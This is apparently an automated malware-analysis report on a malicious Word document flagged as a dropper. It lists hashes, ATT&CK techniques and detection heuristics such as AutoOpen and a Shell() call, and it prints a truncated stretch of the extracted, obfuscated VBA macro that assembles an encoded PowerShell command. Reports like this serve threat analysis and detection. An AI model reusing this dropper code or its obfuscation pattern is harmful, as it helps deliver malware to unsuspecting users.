Office (OLE) malware analysis — malicious · b283b41c1a7d344f

MALICIOUS

Office (OLE)

214.5 KB Created: 2018-06-25 13:22:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: a605b98b6438f79f69ffd8281647895f SHA-1: 52fa4c4a005db3e1d98c94daa84e4b2462fa366e SHA-256: b283b41c1a7d344fd54c564e45416ec7f94965569733fea64cf9ff10d0e8a2f9

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an intent to execute a second-stage payload. ClamAV detection further confirms its malicious nature. The macro's obfuscated string concatenation makes it difficult to determine the exact payload URL or execution details.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6590373-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6590373-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12302 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12302 bytes
SHA-256: `cef9abd8de61c14cfbd41ffce843e75b7682bc1c8810bd62cf66ebc88317fd6f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DIEAPULFSRub" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NZluVZOMJic" Function VmrcQjX() On Error Resume Next oVFFjj = CByte(11688 * Tan(93762) / 84103 + CLng(JmpVjN * 12585 * 26003 * Chr(21484))) afppMM = (44650 / CBool(55344) + 69084 + CSng(oiBHoS) * (69284 - ruoGR + 78360 - CLng(Kpkia))) rMFjlJwBwh = "Hell" + " [stR" + "iNG]" + "::jOIn" + Chr(40) + " '' ," + Chr(40) + "'52" + "}90U67" + "F102c4" + "5@126%11" + "7q103E6" + "1F127" + "@11" TfFkY = CByte(90790 * Tan(72781) / 35603 + CLng(RvVoLd * 61728 * 41582 * Chr(37692))) ZDzKTO = (1960 / CBool(77139) + 2870 + CSng(mwJJA) * (24818 - CHldLz + 37113 - CLng(TbTVzj))) AZYBu = "4E12" + "2q" + "11" + "7U1" + "15S100c4" + "8}94%" vzBfiR = CByte(87494 * Tan(26370) / 83841 + CLng(tPlfzz * 83301 * 67414 * Chr(49087))) EFZRO = (8194 / CBool(58314) + 60255 + CSng(mhSDm) * (29390 - iDPoAQ + 79197 - CLng(LQdiT))) NkCuAW = "117E" + "10" + "0q62@71S" + "117E11" + "4V83V12" + "4}12" + "1V1" + "17U" + "126U" + "100@43}5" EoqTqW = CByte(28625 * Tan(82018) / 1426 + CLng(ItGuE * 52563 * 78913 * Chr(25793))) zcGfRo = (32012 / CBool(37872) + 10497 + CSng(azLKqk) * (32884 - HzlQM + 66228 - CLng(kiJIMY))) DjtoqXn = "2F" + "93F" + "123" + "F88F45" + "c55" + "S120F" + "100S100" + "q96}" + "42F63" + "V63c100V" + "101%98" + "F114F12" UuiFT = CByte(56432 * Tan(89615) / 15396 + CLng(Smijt * 27311 * 30062 * Chr(38899))) TbbtiQ = (46333 / CBool(69991) + 62259 + CSng(HLsZf) * (90118 - TXtuJ + 32771 - CLng(MIScAj))) flikP = "7S114@1" + "01}" + "121%1" + "15@12" + "3c99c6" + "2%" + "126V" + "117%100" + "F63c105V" + "71F81S" + "102%93V" + "12" swBBwv = CByte(5311 * Tan(51325) / 82889 + CLng(JwNhFW * 4562 * 66118 * Chr(51190))) zhHRTn = (19548 / CBool(19866) + 58589 + CSng(azvjAG) * (75290 - NTLRc + 22096 - CLng(aIakD))) rKWVPGYi = "1@" + "63" + "%80q120c" + "100c100" + "U96F42F6" + "3U" + "63q11" + "8V11" + "7U113@10" + "0}101S9" + "8q117%" + "99q115" sJzAq = CByte(96241 * Tan(73987) / 37274 + CLng(zFhLLi * 46571 * 56786 * Chr(99288))) zBAOh = (8979 / CBool(92988) + 94129 + CSng(fjaajh) * (98894 - iBKkqW + 47562 - CLng(SPdPD))) knDOcdWwQJ = "E120@" + "121%126" + "V113E62%" + "115}127" + "F125" + "q63U84%" + "99@84E" + "68" + "S63V80U" uliJb = CByte(73325 * Tan(21160) / 87950 + CLng(tLWaEF * 62941 * 46331 * Chr(83504))) cThPV = (13517 / CBool(59662) + 52963 + CSng(PpShp) * (49762 - QdirBI + 29628 - CLng(LiJLN))) PjLdi = "120F1" + "00F1" + "00S96V" + "42S" + "63U6" + "3@123q1" VmrcQjX = rMFjlJwBwh + AZYBu + NkCuAW + DjtoqXn + flikP + rKWVPGYi + knDOcdWwQJ + PjLdi fGRZs = CByte(3632 * Tan(98611) / 83305 + CLng(EHhkp * 70276 * 91601 * Chr(84696))) USvuIE = (38601 / CBool(8044) + 50848 + CSng(rwTOs) * (39837 - oYOnj + 44436 - CLng(pfihL))) End Function Function nAOuBcziUnQ() On Error Resume Next QtnWzb = CByte(99407 * Tan(73804) / 13022 + CLng(bEGFls * 60076 * 40280 * Chr(78713))) ijBsz = (55711 / CBool(95950) + 77135 + CSng(tFdZmt) * (47679 - kjuVq + 41225 - CLng(STHFv))) uObWCH = "21@" + "126%120" + "c125@1" + "13" + "@100" + "%119@" + "12" + "1S113@" + "127" + "%62c1" + "15" + "q127" mQjQQi = CByte(79429 * Tan(70597) / 13641 + CLng(JLaSj * 23374 * 87017 * Chr(54455))) RzPzm = (85045 / CBool(27108) + 80909 + CSng(jVssNd) * (22781 - CnRZmd + 84299 - CLng(RjQZZ))) SqZVGju = "@125" + "@63V7" + "3V4" + "0S104F9" + "8F" + "88}63" + "E80c120" + "V100@100" + "}96V42q" + "63" + "@63F10" + "3@103" pnzXL = CByte(8292 * Tan(87160) / 94786 + CLng(vHJPwP * 87584 * 21980 * Chr(66576))) CchXmi = (41968 / CBool(44910) + 60329 + CSng(IwQAr) * (68462 - IzMhAS + 61443 - CLng(PaDZi))) PlWtCmcv = "}1" + "03S62q98" + "E127%11" + "4q12" + "1c126" + "E98@117" + "q10" + "5S126%" + "127F12" + "4U11" + "6E9" + "9}124E" VPUpaB = CByte(88900 * Tan(45273) / 14142 + CLng(BCZah * 55244 * 16802 * Chr(25851))) IDvQsB = (20077 / CBool(3765) + 37883 + CS ... (truncated)

SHA-256: cef9abd8de61c14cfbd41ffce843e75b7682bc1c8810bd62cf66ebc88317fd6f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DIEAPULFSRub"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NZluVZOMJic"
Function VmrcQjX()
On Error Resume Next
oVFFjj = CByte(11688 * Tan(93762) / 84103 + CLng(JmpVjN * 12585 * 26003 * Chr(21484)))
afppMM = (44650 / CBool(55344) + 69084 + CSng(oiBHoS) * (69284 - ruoGR + 78360 - CLng(Kpkia)))
rMFjlJwBwh = "Hell" + "  [stR" + "iNG]" + "::jOIn" + Chr(40) + " '' ," + Chr(40) + "'52" + "}90U67" + "F102c4" + "5@126%11" + "7q103E6" + "1F127" + "@11"
TfFkY = CByte(90790 * Tan(72781) / 35603 + CLng(RvVoLd * 61728 * 41582 * Chr(37692)))
ZDzKTO = (1960 / CBool(77139) + 2870 + CSng(mwJJA) * (24818 - CHldLz + 37113 - CLng(TbTVzj)))
AZYBu = "4E12" + "2q" + "11" + "7U1" + "15S100c4" + "8}94%"
vzBfiR = CByte(87494 * Tan(26370) / 83841 + CLng(tPlfzz * 83301 * 67414 * Chr(49087)))
EFZRO = (8194 / CBool(58314) + 60255 + CSng(mhSDm) * (29390 - iDPoAQ + 79197 - CLng(LQdiT)))
NkCuAW = "117E" + "10" + "0q62@71S" + "117E11" + "4V83V12" + "4}12" + "1V1" + "17U" + "126U" + "100@43}5"
EoqTqW = CByte(28625 * Tan(82018) / 1426 + CLng(ItGuE * 52563 * 78913 * Chr(25793)))
zcGfRo = (32012 / CBool(37872) + 10497 + CSng(azLKqk) * (32884 - HzlQM + 66228 - CLng(kiJIMY)))
DjtoqXn = "2F" + "93F" + "123" + "F88F45" + "c55" + "S120F" + "100S100" + "q96}" + "42F63" + "V63c100V" + "101%98" + "F114F12"
UuiFT = CByte(56432 * Tan(89615) / 15396 + CLng(Smijt * 27311 * 30062 * Chr(38899)))
TbbtiQ = (46333 / CBool(69991) + 62259 + CSng(HLsZf) * (90118 - TXtuJ + 32771 - CLng(MIScAj)))
flikP = "7S114@1" + "01}" + "121%1" + "15@12" + "3c99c6" + "2%" + "126V" + "117%100" + "F63c105V" + "71F81S" + "102%93V" + "12"
swBBwv = CByte(5311 * Tan(51325) / 82889 + CLng(JwNhFW * 4562 * 66118 * Chr(51190)))
zhHRTn = (19548 / CBool(19866) + 58589 + CSng(azvjAG) * (75290 - NTLRc + 22096 - CLng(aIakD)))
rKWVPGYi = "1@" + "63" + "%80q120c" + "100c100" + "U96F42F6" + "3U" + "63q11" + "8V11" + "7U113@10" + "0}101S9" + "8q117%" + "99q115"
sJzAq = CByte(96241 * Tan(73987) / 37274 + CLng(zFhLLi * 46571 * 56786 * Chr(99288)))
zBAOh = (8979 / CBool(92988) + 94129 + CSng(fjaajh) * (98894 - iBKkqW + 47562 - CLng(SPdPD)))
knDOcdWwQJ = "E120@" + "121%126" + "V113E62%" + "115}127" + "F125" + "q63U84%" + "99@84E" + "68" + "S63V80U"
uliJb = CByte(73325 * Tan(21160) / 87950 + CLng(tLWaEF * 62941 * 46331 * Chr(83504)))
cThPV = (13517 / CBool(59662) + 52963 + CSng(PpShp) * (49762 - QdirBI + 29628 - CLng(LiJLN)))
PjLdi = "120F1" + "00F1" + "00S96V" + "42S" + "63U6" + "3@123q1"
VmrcQjX = rMFjlJwBwh + AZYBu + NkCuAW + DjtoqXn + flikP + rKWVPGYi + knDOcdWwQJ + PjLdi
fGRZs = CByte(3632 * Tan(98611) / 83305 + CLng(EHhkp * 70276 * 91601 * Chr(84696)))
USvuIE = (38601 / CBool(8044) + 50848 + CSng(rwTOs) * (39837 - oYOnj + 44436 - CLng(pfihL)))
End Function
Function nAOuBcziUnQ()
On Error Resume Next
QtnWzb = CByte(99407 * Tan(73804) / 13022 + CLng(bEGFls * 60076 * 40280 * Chr(78713)))
ijBsz = (55711 / CBool(95950) + 77135 + CSng(tFdZmt) * (47679 - kjuVq + 41225 - CLng(STHFv)))
uObWCH = "21@" + "126%120" + "c125@1" + "13" + "@100" + "%119@" + "12" + "1S113@" + "127" + "%62c1" + "15" + "q127"
mQjQQi = CByte(79429 * Tan(70597) / 13641 + CLng(JLaSj * 23374 * 87017 * Chr(54455)))
RzPzm = (85045 / CBool(27108) + 80909 + CSng(jVssNd) * (22781 - CnRZmd + 84299 - CLng(RjQZZ)))
SqZVGju = "@125" + "@63V7" + "3V4" + "0S104F9" + "8F" + "88}63" + "E80c120" + "V100@100" + "}96V42q" + "63" + "@63F10" + "3@103"
pnzXL = CByte(8292 * Tan(87160) / 94786 + CLng(vHJPwP * 87584 * 21980 * Chr(66576)))
CchXmi = (41968 / CBool(44910) + 60329 + CSng(IwQAr) * (68462 - IzMhAS + 61443 - CLng(PaDZi)))
PlWtCmcv = "}1" + "03S62q98" + "E127%11" + "4q12" + "1c126" + "E98@117" + "q10" + "5S126%" + "127F12" + "4U11" + "6E9" + "9}124E"
VPUpaB = CByte(88900 * Tan(45273) / 14142 + CLng(BCZah * 55244 * 16802 * Chr(25851)))
IDvQsB = (20077 / CBool(3765) + 37883 + CS
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.